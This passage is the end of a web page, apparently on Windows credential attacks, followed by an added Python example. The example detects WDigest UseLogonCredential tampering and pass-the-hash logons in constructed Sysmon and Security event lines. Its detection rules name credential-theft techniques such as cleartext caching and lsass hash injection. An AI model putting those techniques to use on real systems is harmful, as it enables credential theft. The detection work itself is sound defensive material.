class="prefix">Last updated:</span> <span class="time">12/18/2021, 12:46:42 PM</span></div></footer> </main> </div><div class="global-ui"></div></div>
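<p>Added example (not from the original article): the Python below applies defender-side detection logic to two techniques described on this page, the WDigest <code>UseLogonCredential</code> change in the Server 2012 section and the hash injection into <code>lsass.exe</code> in the credential passing section. It runs over constructed event lines in a simplified key=value rendering of Sysmon Event ID 13 (registry value set) and Security Event ID 4624 (logon); the field names are those events' real fields, the values are invented.</p>

```python
import re

# Constructed sample telemetry (not real logs): simplified key=value renderings of
# Sysmon Event ID 13 (registry value set) and Security Event ID 4624 (logon).
SAMPLE_EVENTS = [
    # benign registry write
    "EventID=13 Image=C:\\Windows\\regedit.exe TargetObject=HKLM\\SOFTWARE\\ExampleApp\\Flag Details=DWORD (0x00000001)",
    # the reg add from the Server 2012 section: UseLogonCredential set to 1
    "EventID=13 Image=C:\\Windows\\System32\\reg.exe TargetObject=HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential Details=DWORD (0x00000001)",
    # the restore command (value back to 0) must not alert
    "EventID=13 Image=C:\\Windows\\System32\\reg.exe TargetObject=HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\UseLogonCredential Details=DWORD (0x00000000)",
    # ordinary interactive logon
    "EventID=4624 LogonType=2 LogonProcessName=User32 AuthenticationPackageName=Negotiate TargetUserName=alice",
    # footprint on the source host of a hash injected into lsass (sekurlsa::pth style)
    "EventID=4624 LogonType=9 LogonProcessName=seclogo AuthenticationPackageName=Negotiate TargetUserName=alice",
]

# Tail of the value the page's reg add writes; Sysmon renders the hive as HKLM\System,
# so the comparison is case-insensitive.
WDIGEST_VALUE = "\\securityproviders\\wdigest\\uselogoncredential"

def parse_event(line):
    """Parse 'Key=value Key2=value with spaces'; a value runs until the next ' Key='."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s+\w+=|$)", line))

def is_wdigest_tamper(ev):
    """Sysmon 13 writing a non-zero DWORD to WDigest\\UseLogonCredential."""
    return (ev.get("EventID") == "13"
            and ev.get("TargetObject", "").lower().endswith(WDIGEST_VALUE)
            and not ev.get("Details", "").endswith("(0x00000000)"))

def is_pth_logon(ev):
    """4624 with LogonType 9 (NewCredentials), logon process seclogo and the Negotiate
    package: the local shape of a pass-the-hash injection. 'runas /netonly' produces
    the same shape, so triage on the parent process before escalating."""
    return (ev.get("EventID") == "4624" and ev.get("LogonType") == "9"
            and ev.get("LogonProcessName", "").lower() == "seclogo"
            and ev.get("AuthenticationPackageName") == "Negotiate")

def detect(lines):
    """Return (rule, detail) tuples for every event that matches a rule."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        if is_wdigest_tamper(ev):
            alerts.append(("wdigest_cleartext_enabled", ev.get("Image")))
        elif is_pth_logon(ev):
            alerts.append(("pass_the_hash_logon", ev.get("TargetUserName")))
    return alerts
```

Call <code>detect(SAMPLE_EVENTS)</code> to see the two alerts; the restore-to-0 write and the normal interactive logon produce none.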
    <script src="/assets/js/app.f7464420.js" defer></script><script src="/assets/js/2.26207483.js" defer></script><script src="/assets/js/62.9c0ad8c5.js" defer></script>
  </body>
</html>